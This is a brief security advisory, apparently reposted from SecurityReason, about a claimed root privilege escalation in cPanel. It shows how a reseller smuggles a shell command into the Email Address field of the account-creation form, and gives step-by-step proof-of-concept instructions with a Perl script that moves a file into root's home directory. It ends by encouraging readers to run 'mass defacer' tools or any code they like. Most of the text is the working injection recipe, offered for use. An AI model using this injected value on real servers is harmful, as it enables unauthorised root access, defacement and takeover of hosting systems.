SecurityReason - Cpanel all version >> root access with a reseller account.

Advisory Text :

By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir

Vendor : Cpanel.net

Version : ALL !!

Risk : Very high

What u can do with this bug is :

u can have a access to all the server with reseller privilege (Th3 r00t)

how it's work ?

when u want to create an account in shell what will happen ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab
lab

that u can run it with a web base program ! ( cpanel : doamin:2086)

example :

http://domain:2086/scripts/wwwacct [domainname] [username] [password]
[Email address] lab lab lab

it means you got a access to wwwacct in the scripts folder (Th3 r00t)

so u can run other command with root access like that

./scripts/wwwactt domain.com domain password ali (at) hackerz (dot) ir
[email concealed];./home/hackerz/public_html/do.pl ( your command now is
./home/hackerz/public_html/do.pl)

that u can Likewise run it on the web base program.what u need to do is
just write ali (at) hackerz (dot) ir [email
concealed];./home/hackerz/public_html/do.pl in Email text box when u want
to create an account.

()()()()()()()()()()()()()

Test it:

++++++++++++++++++++++++++

Step 1

Save this file in /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

step 2

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

step 3

create an account and write ali (at) hackerz (dot) ir [email
concealed];./home/user/public_html/do.pl in E-mail Address text box

then click on the "create" button.
you can find your file in /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

you can run your own code !(mass defacer, exploit's or everything that u
want).

Enjoy it...